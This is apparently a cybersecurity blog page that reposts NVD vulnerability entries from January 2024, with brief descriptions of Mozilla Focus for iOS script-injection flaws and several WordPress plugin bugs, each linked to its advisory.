First published on : 22-01-2024 18:15:19
Last modified on : 22-01-2024 18:15:19

Description :
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.

CVE ID : CVE-2022-45795
Source : ot-cert@dragos.com
CVSS Score : /

References :


Source : mozilla.org

Vulnerability ID : CVE-2024-0605

First published on : 22-01-2024 19:15:09
Last modified on : 22-01-2024 20:28:17

Description :
Using a javascript: URI with a setTimeout race condition, an attacker can execute unauthorized scripts on top origin sites in urlbar. This bypasses security measures, potentially leading to arbitrary code execution or unauthorized actions within the user's loaded webpage. This vulnerability affects Focus for iOS < 122.

CVE ID : CVE-2024-0605
Source : security@mozilla.org
CVSS Score : /

References :
https://bugzilla.mozilla.org/show_bug.cgi?id=1855575 | source : security@mozilla.org
https://www.mozilla.org/security/advisories/mfsa2024-03/ | source : security@mozilla.org


Vulnerability ID : CVE-2024-0606

First published on : 22-01-2024 19:15:09
Last modified on : 22-01-2024 20:28:17

Description :
An attacker could execute unauthorized script on a legitimate site through UXSS using window.open() by opening a javascript URI leading to unauthorized actions within the user's loaded webpage. This vulnerability affects Focus for iOS < 122.

CVE ID : CVE-2024-0606
Source : security@mozilla.org
CVSS Score : /

References :
https://bugzilla.mozilla.org/show_bug.cgi?id=1855030 | source : security@mozilla.org
https://www.mozilla.org/security/advisories/mfsa2024-03/ | source : security@mozilla.org


Source : wpscan.com

Vulnerability ID : CVE-2023-6290

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The SEOPress WordPress plugin before 7.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed

CVE ID : CVE-2023-6290
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/78a13958-cd12-4ea8-b326-1e3184da970b/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6384

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The WP User Profile Avatar WordPress plugin before 1.0.1 does not properly check for authorisation, allowing authors to delete and update arbitrary avatars.

CVE ID : CVE-2023-6384
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/fbdefab4-614b-493b-a9ae-c5aeff8323ef/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6447

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The EventPrime WordPress plugin before 3.3.6 lacks authentication and authorization, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id/event name.

CVE ID : CVE-2023-6447
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/e366881c-d21e-4063-a945-95e6b080a373/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6456

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The WP Review Slider WordPress plugin before 13.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE ID : CVE-2023-6456
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/30f31412-8f94-4d5e-a080-3f6f669703cd/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6625

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The Product Enquiry for WooCommerce WordPress plugin before 3.1 does not have a CSRF check in place when deleting inquiries, which could allow attackers to make a logged in admin delete them via a CSRF attack

CVE ID : CVE-2023-6625
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/d483f7ce-cb3f-4fcb-b060-005cec0ea10f/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6626

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The Product Enquiry for WooCommerce WordPress plugin before 3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE ID : CVE-2023-6626
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/327ae124-79eb-4e07-b029-e4f543cbd356/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-7082

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The Import any XML or CSV File to WordPress plugin before 3.7.3 accepts all zip files and automatically extracts the zip file into a publicly accessible directory without sufficiently validating the extracted file type. This may allow high privilege users such as administrators to upload an executable file type, leading to remote code execution.

CVE ID : CVE-2023-7082
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/7f947305-7a72-4c59-9ae8-193f437fd04e/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-7170

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The EventON-RSVP WordPress plugin before 2.9.5 does not sanitise and escape some parameters before outputting them back in the page, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

CVE ID : CVE-2023-7170
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/218fb3af-3a40-486f-8ea9-80211a986fb3/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-7194

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The Meris WordPress theme through 1.1.2 does not sanitise and escape some parameters before outputting them back in the page, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin

CVE ID : CVE-2023-7194
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/e20292af-939a-4cb1-91e4-5ff6aa0c7fbe | source : contact@wpscan.com


This website uses the NVD API, but is not approved or certified by it.

About the author
Julien B.

Securitricks

Up-to-Date Cybersecurity Insights & Malware Reports
